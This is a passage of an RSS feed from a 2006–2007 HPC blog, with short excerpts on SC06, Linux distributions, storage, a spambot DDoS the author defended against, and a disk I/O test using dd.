      <guid>https://blog.scalability.org/2007/01/inversion/</guid>
      <description>Suppose you had an opportunity to get some applications (open source and otherwise) onto CCS. Which apps would you like to see? I have my own list, but I would like to hear yours. I ask as I know most apps run great on the current mainstream clusters. You know, those myriad Linux units.
What are your major concerns in getting apps on there? Right now there is a defined lack of apps on CCS.</description>
    </item>
    
    <item>
      <title>NIH and aimk-ing your way into insanity</title>
      <link>https://blog.scalability.org/2007/01/nih-and-aimk-ing-your-way-into-insanity/</link>
      <pubDate>Tue, 30 Jan 2007 06:34:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/nih-and-aimk-ing-your-way-into-insanity/</guid>
      <description>There is a tendency in the technical world to be enamored of one&amp;rsquo;s own &amp;ldquo;stuff&amp;rdquo; to the exclusion of other &amp;ldquo;stuff&amp;rdquo;. In the sense that if you didn&amp;rsquo;t invent it, it can&amp;rsquo;t be good. Sometimes it is called NIH for &amp;ldquo;not invented here&amp;rdquo; when it pervades a larger group.
Make is one such example. Make is an incredibly powerful tool. Insanely powerful, as it is quite simple to use and work with.</description>
    </item>
    
    <item>
      <title>Commoditization in HPC</title>
      <link>https://blog.scalability.org/2007/01/commoditization-in-hpc/</link>
      <pubDate>Fri, 26 Jan 2007 05:28:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/commoditization-in-hpc/</guid>
      <description>Chris over at the excellent hpcanswers.com site wrote an article for HPCWire entitled &amp;ldquo;Innovation and Commoditization in HPC&amp;rdquo;. He makes quite a few points in there, but they have a constant theme.
The idea is to do things better than before, drive down your costs, increase the performance, and do this continuously. He cites several examples of this, and postulates others. This is a good article, though I would probably suggest refining some of the points.</description>
    </item>
    
    <item>
      <title>Congratulations to IBM on their 22TF win at OSC</title>
      <link>https://blog.scalability.org/2007/01/congratulations-to-ibm-on-their-22tf-win-at-osc/</link>
      <pubDate>Thu, 25 Jan 2007 22:01:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/congratulations-to-ibm-on-their-22tf-win-at-osc/</guid>
      <description>It seems IBM won the OSC procurement with a 22TF system. Oddly enough (really oddly enough), our bid was also 22TF in power. I would like to see the final configuration and pricing. I wonder if our bid somehow contributed to the final IBM configuration (this would be disappointing, but not terribly surprising).</description>
    </item>
    
    <item>
      <title>Grrrr</title>
      <link>https://blog.scalability.org/2007/01/grrrr/</link>
      <pubDate>Tue, 23 Jan 2007 23:47:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/grrrr/</guid>
      <description>Let me say this forcefully. Linux is not Redhat. Redhat packages Linux, as do others. They support it as do others. They contribute to it, as do others. They don&amp;rsquo;t &amp;ldquo;define&amp;rdquo; it. That&amp;rsquo;s what standards bodies are for. LSB. I keep running into all sorts of problems in getting things properly working with hardware or software that has been built around the Redhat == Linux model. Sadly, this does nothing to convince me to use more Redhat.</description>
    </item>
    
    <item>
      <title>Update on ECCB06</title>
      <link>https://blog.scalability.org/2007/01/update-on-eccb06/</link>
      <pubDate>Tue, 23 Jan 2007 23:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/update-on-eccb06/</guid>
      <description>Well, the conference is almost over, but I can&amp;rsquo;t stay to the end. Lots of very interesting talks and posters. Met a few people I had spoken to in the past. The demo (e.g. from &amp;ldquo;We Say So&amp;rdquo;) was a few days ago. I wound up not using the VMware instance. There were simply too many headaches in possibly using it (logistical). It is a shame. I will develop this more fully, so it is ready next time.</description>
    </item>
    
    <item>
      <title>Sadness</title>
      <link>https://blog.scalability.org/2007/01/sadness/</link>
      <pubDate>Mon, 22 Jan 2007 20:02:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/sadness/</guid>
      <description>I just read this on the Detroit Free Press after seeing it on Drudge. Ok. I have friends and acquaintances who work there. Just like my friends at Ford, many of whom will likely be on the receiving end of a job-ax. So what is the state to do?
A number of things. First: There is a whole heck-of-a-lot-a talent in Michigan. Huge amounts. Maybe, somehow, someway, if we could, I dunno, stop subsidizing failing industries and focus on, I don&amp;rsquo;t know, microcapitalizing small startup ideas here &amp;hellip; Sort of like a MLSC but done right.</description>
    </item>
    
    <item>
      <title>Pictures for a portion of day 1</title>
      <link>https://blog.scalability.org/2007/01/pictures-for-a-portion-of-day-1/</link>
      <pubDate>Sun, 21 Jan 2007 12:21:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/pictures-for-a-portion-of-day-1/</guid>
      <description>Are up here. It is very nice here. Using Google Earth it wasn&amp;rsquo;t too hard to figure out where it was. Download this KML and load it into Google Earth.</description>
    </item>
    
    <item>
      <title>At ECCB06 in Eilat</title>
      <link>https://blog.scalability.org/2007/01/at-eccb06-in-eilat/</link>
      <pubDate>Sun, 21 Jan 2007 00:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/at-eccb06-in-eilat/</guid>
      <description>ECCB06 is starting tomorrow in Eilat. The story of this travel is full of sound and fury. And time. Lots and lots of time. Waiting. And things breaking. Or not working. And did I mention time?
I am presenting accelerated informatics demos for AMD at 10:30am Monday morning. Should be lots of fun. Ok, being a good little presenter type, I gathered up everything I needed and got it into my carry-on bags for the trip.</description>
    </item>
    
    <item>
      <title>Some amazingly bad web sites</title>
      <link>https://blog.scalability.org/2007/01/some-amazingly-bad-web-sites/</link>
      <pubDate>Wed, 17 Jan 2007 18:06:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/some-amazingly-bad-web-sites/</guid>
      <description>No, not a Not-Safe-For-Work variety. I just visited a web site which is used in potential customers purchase processes. They have links on this site.
Someone decided that it would be a &amp;ldquo;Good-Thing&amp;rdquo;(TM) if they set up these links to launch not one, but 2, yessirree, 2 modal dialog boxes on mouseover events. Yup. Roll over the link, and these two pop right up &amp;hellip; &amp;hellip; and &amp;hellip; you &amp;hellip; cannot &amp;hellip; use &amp;hellip; the &amp;hellip; browser &amp;hellip; until &amp;hellip; you &amp;hellip; click &amp;hellip; them &amp;hellip; which would be just moderately annoying (and a funny but bad design) if it wasn&amp;rsquo;t for the fact that your mouse is in the middle of a forest of links there.</description>
    </item>
    
    <item>
      <title>&#34;We Say So&#34; corporation</title>
      <link>https://blog.scalability.org/2007/01/we-say-so-corporation/</link>
      <pubDate>Mon, 15 Jan 2007 03:40:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/we-say-so-corporation/</guid>
      <description>I used to watch a rather funny show on ABC TV named &amp;ldquo;Dinosaurs&amp;rdquo; about your typical Jurassic period nuclear family, with large dinosaurs having similar problems to modern day humans. It was quite funny. The father dinosaur worked for &amp;ldquo;We Say So&amp;rdquo; corporation. Should give you an idea of what they did, and how they did it. You didn&amp;rsquo;t have a choice. You had to do what they wanted. The following is a bit of venting.</description>
    </item>
    
    <item>
      <title>The cost of monoculture part 2</title>
      <link>https://blog.scalability.org/2007/01/the-cost-of-monoculture-part-2/</link>
      <pubDate>Sun, 14 Jan 2007 17:36:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/the-cost-of-monoculture-part-2/</guid>
      <description>Some customers have binding agreements with specific (pick your favorite TLA) vendors and insist upon buying from only them. They somehow believe they are getting a discount. It is worked into the price. They somehow believe that this saves them money.
It doesn&amp;rsquo;t. It reduces competition for their business. It increases their costs when the technological fit just isn&amp;rsquo;t there, yet they try to force the issue. So how does decreasing competition and efficiency increase savings?</description>
    </item>
    
    <item>
      <title>DDoS jujitsu, or using the DDoSers mass against them</title>
      <link>https://blog.scalability.org/2007/01/ddos-jujitsu-or-using-the-ddosers-mass-against-them/</link>
      <pubDate>Sun, 14 Jan 2007 15:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/ddos-jujitsu-or-using-the-ddosers-mass-against-them/</guid>
      <description>We have been under a DDoS, with spambots each sending us a few messages per day, something north of 100k messages per day in aggregate. I am not concerned about our infrastructure; it was holding up fine. I was more concerned about components that we didn&amp;rsquo;t have control over, or had no part in designing or building. This raised the question: is there nothing that one can do to defend against a DDoS (email spambot) attack?</description>
    </item>
    
    <item>
      <title>The configuration strikes back ...</title>
      <link>https://blog.scalability.org/2007/01/the-configuration-strikes-back/</link>
      <pubDate>Sat, 13 Jan 2007 20:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/the-configuration-strikes-back/</guid>
      <description>The bot attack continues for a third day. We are rejecting, on average, one email per second. At this rate, we will have rejected 31.5 million emails over the course of 1 year. I wonder if the attackers think that DDoS is a good thing, or something valid to do to other net-denizens. Sad.</description>
    </item>
    
    <item>
      <title>When bots attack</title>
      <link>https://blog.scalability.org/2007/01/when-bots-attack/</link>
      <pubDate>Fri, 12 Jan 2007 20:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/when-bots-attack/</guid>
      <description>We must be famous. We are being distributed bot-attacked by someone/thing. They are trying to knock over our mail system. Some of the bad IPs are here: 67.90.119.98, 195.50.165.22, and 12.154.55.44. Lots of others. For laughs:
whois 12.154.55.44
[Querying whois.arin.net]
[whois.arin.net]
AT&amp;amp;T WorldNet Services ATT (NET-12-0-0-0-1) 12.0.0.0 - 12.255.255.255
ATT MIS IP-WCS OPERATIONS CTRS ATT-MIS-44-55 (NET-12-154-55-0-1) 12.154.55.0 - 12.154.55.255
# ARIN WHOIS database, last updated 2007-01-11 19:10
# Enter ? for additional hints on searching ARIN&#39;s WHOIS database.</description>
    </item>
    
    <item>
      <title>Phase transitions</title>
      <link>https://blog.scalability.org/2007/01/phase-transitions/</link>
      <pubDate>Wed, 03 Jan 2007 20:47:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/phase-transitions/</guid>
      <description>Usually start with a few small nucleation sites. Create enough of a net savings in energy, and entropy, and whammo, you are starting the rapid, highly nonlinear, often discontinuous traversal of the phase coordinate. Of such things, revolutions are born within computing. It is happening with APUs, it has happened with dual core, and it appears more likely to be happening outside of HPC. Update: R.L. Polk is not that far from us.</description>
    </item>
    
    <item>
      <title>Disruptive market changes</title>
      <link>https://blog.scalability.org/2007/01/disruptive-market-changes/</link>
      <pubDate>Wed, 03 Jan 2007 20:33:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/disruptive-market-changes/</guid>
      <description>Sharad Sharma at Orbit Change responded to my criticism with a note of his own. He clarified his context.
Quoting him, his original thesis is
Fair enough, needs drive innovation. The &amp;ldquo;must have&amp;rdquo; phenomenon. Build something that remarkably alters the economics to be strongly positive for customers to acquire and use over their existing technologies, or reduce their pain points so that they can save lots of money due to the secondary effects of workload reduction/automation.</description>
    </item>
    
    <item>
      <title>Get your MPI-HMMer while its hot ...</title>
      <link>https://blog.scalability.org/2007/01/get-your-mpi-hmmer-while-its-hot/</link>
      <pubDate>Wed, 03 Jan 2007 05:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/get-your-mpi-hmmer-while-its-hot/</guid>
      <description>Short version: MPI-HMMer has been released. See this link for details, and if you want RPMs, go here.</description>
    </item>
    
    <item>
      <title>So many (mis)interpretations</title>
      <link>https://blog.scalability.org/2007/01/so-many-misinterpretations/</link>
      <pubDate>Tue, 02 Jan 2007 15:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/01/so-many-misinterpretations/</guid>
      <description>Oftentimes, things we say or write about are taken slightly (or massively) out of context, repackaged, and written or spoken about in a different manner that subsumes the original context or intent. Even well-meaning people do this. It is all part of the process of forming an opinion, specifically an interpretation of events or speech. One might construe that a specific person wrote something they did not.
Where am I going with this?</description>
    </item>
    
    <item>
      <title>The (black) art of prediction</title>
      <link>https://blog.scalability.org/2006/12/the-black-art-of-prediction/</link>
      <pubDate>Sun, 31 Dec 2006 15:30:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/the-black-art-of-prediction/</guid>
      <description>As this is the last day of 2006, many pundits are making bold, or in some cases, ridiculous, predictions about the future. Some have even made predictions about the past, a bizarre action to be sure, but one that seems to have happened.
Prediction is an art. Sometimes it goes wrong. Badly wrong. Sometimes good companies make bad decisions based upon bad predictions. This is in part why SGI dropped the Beast and Alien in the late 90&amp;rsquo;s to hop on board the Itanium express.</description>
    </item>
    
    <item>
      <title>Supposedly obvious predictions</title>
      <link>https://blog.scalability.org/2006/12/supposedly-obvious-predictions/</link>
      <pubDate>Sun, 31 Dec 2006 04:29:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/supposedly-obvious-predictions/</guid>
      <description>/. linked to some predictions for the next year. Three of them pertain to HPC.
Before I get into the three predictions, let me point out that predicting events that have already happened is not generally hard. This is important for the first prediction. He indicates that Itanium is on life support, and that HP is trying to get out of its deal with Intel. Apparently he is not aware that this appears to have already happened.</description>
    </item>
    
    <item>
      <title>Software appliances:  rPath</title>
      <link>https://blog.scalability.org/2006/12/software-appliances-rpath/</link>
      <pubDate>Wed, 20 Dec 2006 17:57:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/software-appliances-rpath/</guid>
      <description>Now that I have complained aloud about conary, which is the package management bit in rPath, let me praise the idea behind rPath.
No, no one prompted me. No nastygrams. My major issue is with Conary, the distribution builder, and the decisions that must have gone into it. Punchline: rPath works, though Conary is proving to be more of a pain than RPM; it is less apparent than I would like how one builds an appliance; and integrating the things we need to integrate, such as lots of perl modules and other bits, is a non-starter due to the issues in dealing with Conary and their distribution build system.</description>
    </item>
    
    <item>
      <title>The many joys of Redhat based linux distributions: part 1, filesystems and conary</title>
      <link>https://blog.scalability.org/2006/12/the-many-joys-of-redhat-based-linux-distributions-part-1-filesystems-and-conary/</link>
      <pubDate>Tue, 19 Dec 2006 01:57:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/the-many-joys-of-redhat-based-linux-distributions-part-1-filesystems-and-conary/</guid>
      <description>A customer has a JackRabbit. They want to install Scientific Linux 4.4 (SL4.4) on it. Ok.
Holding back on the criticism of the positively ancient kernel in RHEL4-derived distributions, its weak NUMA support, and other issues, let&amp;rsquo;s look at file systems. JackRabbit is a server: a 5U monster that can push tremendous amounts of data around, to disk, from disk, and out onto the network. It needs a relatively modern kernel to make best use of its chipsets, which aren&amp;rsquo;t supported before 2.
    </item>
    
    <item>
      <title>Legal shenanigans or not</title>
      <link>https://blog.scalability.org/2006/12/legal-shenanigans-or-not/</link>
      <pubDate>Wed, 06 Dec 2006 13:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/legal-shenanigans-or-not/</guid>
      <description>PJ over at Groklaw.net is often a fun read. Her commentary on the SCO case has been excellent, if not loaded with biting sarcasm and witty humor. I think that this is good, as SCO deserves the derision heaped upon it for lighting off a case that their overlords appear to have asked for, without checking to see whether or not it was real enough to push.
In business as in parenting, you have to learn to pick your fights.</description>
    </item>
    
    <item>
      <title>On business models and markets</title>
      <link>https://blog.scalability.org/2006/12/on-business-models-and-markets/</link>
      <pubDate>Wed, 06 Dec 2006 03:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/on-business-models-and-markets/</guid>
      <description>or: why is the volume desktop market leader interested in a small market like Supercomputing?
I can&amp;rsquo;t answer that one easily, as the return on their investment will be low. It would behoove any Microsoft shareholder to ask the management team at the annual shareholder meeting why they are going after something so small relative to other more profitable and larger markets. I cannot fathom the business model that they have for this.</description>
    </item>
    
    <item>
      <title>The missing windows in top500</title>
      <link>https://blog.scalability.org/2006/12/the-missing-windows-in-top500/</link>
      <pubDate>Wed, 06 Dec 2006 03:10:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/the-missing-windows-in-top500/</guid>
      <description>I read this article about the state of windows machines in the top500 list of &amp;ldquo;fastest&amp;rdquo; supercomputers. Remember that Microsoft indicates it has no interest in the top500; given its purported strategy, that sounds correct: they shouldn&amp;rsquo;t care about &amp;ldquo;non-mainstream&amp;rdquo; supercomputers.
Since Microsoft appears to want to make supercomputers appear to be simply big PCs that are out of sight, focusing on top500 doesn&amp;rsquo;t make much sense.</description>
    </item>
    
    <item>
      <title>Myths and hype: first of likely many articles</title>
      <link>https://blog.scalability.org/2006/12/myths-and-hype-first-of-likely-many-articles/</link>
      <pubDate>Sun, 03 Dec 2006 16:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/myths-and-hype-first-of-likely-many-articles/</guid>
      <description>We have spoken to many customers as of late about storage. Apparently there is this new high performance physical interconnect akin to the venerable and aging Fibre Channel, SCSI, and other related technologies. Its name? iSCSI. Can you tell what&amp;rsquo;s wrong with this?
The customers can&amp;rsquo;t. And we can blame the marketing hype machines for this situation. iSCSI is new, is quite interesting, and is the right solution for many users.</description>
    </item>
    
    <item>
      <title>SuSE and Microsoft: as the world turns ...</title>
      <link>https://blog.scalability.org/2006/11/suse-and-microsoft-as-the-world-turns/</link>
      <pubDate>Tue, 28 Nov 2006 15:04:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/suse-and-microsoft-as-the-world-turns/</guid>
      <description>Ok, so the soap opera title may in fact be appropriate. When the deal was first announced, reading over the press release had me thinking that a good convergence was in order. We were seeing Microsoft finally (correctly) decide that working with Linux was a good thing for it. Then the Microsoft execs opened their mouths.
What they managed to do is to give ammunition to all the people in the community opposed to such deals, a large, well &amp;hellip; no &amp;hellip; a huge bolus of things to be concerned about, and further to give them an unfortunately large platform upon which to (correctly) shout that they were in fact right.</description>
    </item>
    
    <item>
      <title>SC06 wrap up: thoughts on what I did not see or hear</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-did-not-see-or-hear/</link>
      <pubDate>Tue, 28 Nov 2006 07:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-did-not-see-or-hear/</guid>
      <description>From the last post, you can read some of what I did see and hear. This is about what was missing.
 Applications: The folks from Microsoft showed off excel running on a cluster. Some of the others showed &amp;ldquo;trivial&amp;rdquo; or booth-specific applications. These weren&amp;rsquo;t real things in most cases; they were smaller &amp;ldquo;toy&amp;rdquo; apps or models. Maybe I missed it, but I did not see many applications that demanded supercomputing.</description>
    </item>
    
    <item>
      <title>SC06 wrap up: thoughts on what I saw and heard</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-saw-and-heard/</link>
      <pubDate>Tue, 28 Nov 2006 06:37:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-saw-and-heard/</guid>
      <description>Well, SC06 is now history. Reno is the next venue. Maybe we will have a bit of a booth then. So what happened, what was extraordinary, what was ordinary?
This is kind of hard. Last year, there was so much cool stuff; this year, well, somewhat less cool stuff. The exhibit did not seem as big this year, or as lively. Looked like lots of vendors talking to each other. I had a distinct sense that this was a high tech equivalent of a red light district &amp;hellip; Ok &amp;hellip; let&amp;rsquo;s be more focused.</description>
    </item>
    
    <item>
      <title>SC06 wrapup summary</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrapup-summary/</link>
      <pubDate>Mon, 27 Nov 2006 18:28:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrapup-summary/</guid>
      <description>Ok, been promising to post this, so I am going to break it up into chunks. I will report on what I saw, what I didn&amp;rsquo;t see, and what I wanted to see. Will break each of these into a post of its own for better manageability.</description>
    </item>
    
    <item>
      <title>Thoughts about what support is, and what it isn&#39;t</title>
      <link>https://blog.scalability.org/2006/11/thoughts-about-what-support-is-and-what-it-isnt/</link>
      <pubDate>Mon, 27 Nov 2006 17:48:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/thoughts-about-what-support-is-and-what-it-isnt/</guid>
      <description>These thoughts are randomly coursing through my mind as I sit here waiting on the support number for HP. I purchased an HP laptop for business use about 2 years ago, and it has had a few problems. It&amp;rsquo;s a great unit: AMD64, 1 GB ram, big disk, nVidia graphics. Would love to get something like this again when I buy the next one in about 6-9 months.
Most recent issues have been with the lid and the USB ports.</description>
    </item>
    
    <item>
      <title>HPCS has chosen, and the winners are ...</title>
      <link>https://blog.scalability.org/2006/11/hpcs-has-chosen-and-the-winners-are/</link>
      <pubDate>Thu, 23 Nov 2006 01:36:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/hpcs-has-chosen-and-the-winners-are/</guid>
      <description>Cray and IBM. Congratulations to them. HPCS is about making supercomputers more productive for end users. How to leverage tremendous efficiencies, build better languages for faster, better, more accurate development. I was very impressed with Chapel. IBM&amp;rsquo;s looked like a Java derivative, as verbose and opaque as Java usually is (it is often hard to discern what Java is doing from Java source).
Regardless of this, now we can see where this will go.</description>
    </item>
    
    <item>
      <title>Bandwidth as a natural limiting factor for technological evolution</title>
      <link>https://blog.scalability.org/2006/11/bandwidth-as-a-natural-limiting-factor-for-technological-evolution/</link>
      <pubDate>Tue, 21 Nov 2006 06:09:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/bandwidth-as-a-natural-limiting-factor-for-technological-evolution/</guid>
      <description>Ok, this has been bouncing around in my head for a while now. Been trying to work up something to really describe it correctly in terms of a mathematical model. I have an idea, but too little time to work on it.
Here is the hypothesis. Information technologies gradually evolve to a point where their performance is fundamentally limited by their interconnection bandwidth. Recent examples of this are multicore chips. No matter how much bandwidth you throw at something, if you hold that bandwidth, that fixed resource, constant, and simply increase the number of cycles available, or if you prefer, the &amp;ldquo;size&amp;rdquo; of the resource, then at some point the effects of resource contention will dominate, and you have to actively work to hide communication behind calculation.</description>
    </item>
    
    <item>
      <title>That didn&#39;t take long ...</title>
      <link>https://blog.scalability.org/2006/11/that-didnt-take-long/</link>
      <pubDate>Tue, 21 Nov 2006 05:18:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/that-didnt-take-long/</guid>
      <description>The folks at /. have linked to an open letter to the OSS community from Novell. This impacts HPC in that much of HPC is done on Linux, a large and growing fraction if you look at Top500 and other measures.
Here is why I thought it was a good thing.
Yes. Exactly. Companies &amp;hellip; no &amp;hellip; customers want interoperability. Moreover, they don&amp;rsquo;t really like it when their suppliers start suing each other, or them.</description>
    </item>
    
    <item>
      <title>And the FUD begins in earnest ... (mostly non-HPC)</title>
      <link>https://blog.scalability.org/2006/11/and-the-fud-begins-in-earnest-mostly-non-hpc/</link>
      <pubDate>Mon, 20 Nov 2006 21:17:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/and-the-fud-begins-in-earnest-mostly-non-hpc/</guid>
      <description>Ok, so color me amused. I knew that it would not take long, and sure enough, the &amp;ldquo;independent&amp;rdquo; bloggers doing marketing for various organizations have fired their second shot. The first one is the &amp;ldquo;Linux is too hard&amp;rdquo; meme that seems to have died the quiet death it deserved. This next one is unfortunately just as laughable, as it shows a fundamental misunderstanding of something critical.
This meme could be called &amp;ldquo;Open Source is Dangerous&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Must be deja vu</title>
      <link>https://blog.scalability.org/2006/11/must-be-deja-vu/</link>
      <pubDate>Sat, 18 Nov 2006 14:40:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/must-be-deja-vu/</guid>
      <description>I haven&amp;rsquo;t had a chance to do more posts or a wrap up of SC06. I will do this soon. I want to briefly point out this article. And offer a mea culpa.
Briefly, I had a discussion with Patrick of the Microsoft team about Microsoft&amp;rsquo;s goals and vision. You know, if you just remove the CEO&amp;rsquo;s occasional statements about his competitor being a virus, a cancer, and so on, the vision isn&amp;rsquo;t bad, and is something that we can work with.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 photos are up</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-photos-are-up/</link>
      <pubDate>Wed, 15 Nov 2006 06:32:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-photos-are-up/</guid>
      <description>Here.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 3</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-3-2/</link>
      <pubDate>Wed, 15 Nov 2006 06:10:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-3-2/</guid>
      <description>Why 3 parts? Well, why do two when a third is just 50% more &amp;hellip; The universities: are out in force. Excellent stuff. If you get a chance, go by the SUNY Buffalo booth (UB booth) and pick up the MPI-HMMer page. JP and Vipin have worked hard on this code, and they deserve serious kudos for it. Many more things to talk about, more tomorrow. With regards to the Microsoft dinner, I do regret missing this.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 2</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-2/</link>
      <pubDate>Wed, 15 Nov 2006 06:08:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-2/</guid>
      <description>Why 2 parts? It seems that when posting blogs from hotel rooms, the hotel network may somehow limit the amount you can upload to a web site. Not sure why, but it fails to work while here, though it works great elsewhere.
The point about making more computing power open and accessible to wider groups of people is critical. As for driving the computing to the desktop: though there was, how shall I put this, spirited discussion about whether a &amp;ldquo;cluster under the desktop&amp;rdquo; made sense, the message is clear.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 1</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-1/</link>
      <pubDate>Wed, 15 Nov 2006 06:03:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-1/</guid>
      <description>First off, I missed the very thing I was most looking forward to, in large part due to getting caught up in a great BoF, run by a friend and former colleague. This was my fault, I had fully intended to have dinner with the Microsoft team. My apologies to them and to the other guests. More about this a little later.
I am uploading pictures/photos/movies, including about 15 minutes of Ray Kurzweil&amp;rsquo;s keynote.</description>
    </item>
    
    <item>
      <title>More SC06 blogs</title>
      <link>https://blog.scalability.org/2006/11/more-sc06-blogs/</link>
      <pubDate>Tue, 14 Nov 2006 03:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/more-sc06-blogs/</guid>
      <description>Doug Eadline and Jeff Layton are blogging at ClusterMonkey. Gala happened, we missed it. Went out to dinner a little ways down the street. Solved the camera issue. I hope. Set up a place for SC06 pictures/movies on the photo site. Hopefully it will be obvious which are SC06 &amp;hellip; Going to be there early tomorrow. Will try lots of pictures/movies.</description>
    </item>
    
    <item>
      <title>SC06:  All registered</title>
      <link>https://blog.scalability.org/2006/11/sc06-all-registered/</link>
      <pubDate>Mon, 13 Nov 2006 20:26:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-all-registered/</guid>
      <description>Picked up Jim at the airport, then made our way over. All registered. Saw lots of people already. Had some good conversations. I forgot how energy draining this is. Need to increase caloric intake.
That and coffee. There doesn&amp;rsquo;t seem to be much in the way of coffee shops down here. Need to google about for that. The biggest &amp;ldquo;loss&amp;rdquo; from last year was the fleece sweaters. Sure, this is Florida, and we shouldn&amp;rsquo;t need sweaters &amp;hellip; got two mugs.</description>
    </item>
    
    <item>
      <title>SC06 begins ...</title>
      <link>https://blog.scalability.org/2006/11/sc06-begins/</link>
      <pubDate>Mon, 13 Nov 2006 13:01:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-begins/</guid>
      <description>ok, so it is later tonight, officially, at the &amp;ldquo;Gala&amp;rdquo; event. The &amp;ldquo;usual crew&amp;rdquo; of bloggers will be there, as will lots of friends and colleagues from the past. Someone once told me that Supercomputing is quite incestuous: they steal &amp;hellip; er, hire from each other with abandon. It is always enjoyable to visit and see friends with new business cards, new digs, and similar stories of how company X is in decline and Y is ascendant.</description>
    </item>
    
    <item>
      <title>Arrived at SC06</title>
      <link>https://blog.scalability.org/2006/11/arrived-at-sc06/</link>
      <pubDate>Mon, 13 Nov 2006 04:27:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/arrived-at-sc06/</guid>
      <description>Getting here was fun. Most everything went without a hitch. The TSA did not appreciate the larger sized toothpaste and shaving cream in my carry-on. I&amp;rsquo;ll refrain from commenting on this.
I managed to leave my camera at home. Go figure. I will work out a way to get photos posted to http://photos.scalability.org . Hopefully not cell-phone quality, but real ones. Tomorrow night is the opening gala. Then Tuesday night is Beo-bash, and the folks at Microsoft have invited a few people to have dinner.</description>
    </item>
    
    <item>
      <title>What is L. Flavigularis</title>
      <link>https://blog.scalability.org/2006/11/what-is-l-flavigularis/</link>
      <pubDate>Mon, 13 Nov 2006 04:19:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/what-is-l-flavigularis/</guid>
      <description>Ok, I have been hinting at something we have been working on for a while. Time to talk a little more about this.
This is a server we are calling &amp;ldquo;JackRabbit&amp;rdquo;. The L. Flavigularis is a particular sub-species of JackRabbit. It comes in 3U and 5U flavors, and as a storage unit, could support from 6 TB through 36 TB, with 2 to 8 processor cores, and up to 64 GB ram, with multiple gigabit ethernet, Infiniband, and other technologies.</description>
    </item>
    
    <item>
      <title>A hint of things to come ...</title>
      <link>https://blog.scalability.org/2006/11/a-hint-of-things-to-come/</link>
      <pubDate>Fri, 10 Nov 2006 03:46:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/a-hint-of-things-to-come/</guid>
      <description>Some of my collaborators should have a very interesting announcement about an accelerated life science application coming out soon. Stay tuned&amp;hellip;</description>
    </item>
    
    <item>
      <title>Yet another not so useful test, learning more things about Linux IO</title>
      <link>https://blog.scalability.org/2006/11/yet-another-not-so-useful-test-learning-more-things-about-linux-io/</link>
      <pubDate>Fri, 10 Nov 2006 02:07:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/yet-another-not-so-useful-test-learning-more-things-about-linux-io/</guid>
      <description>for our little conejo (L. Flavigularis). Create a 128 GB file. Filled with zeros.
[root@jackrabbit 2]# time dd if=/dev/zero of=big_file bs=1024000000 count=128
128+0 records in
128+0 records out
real 3m59.539s
user 0m0.000s
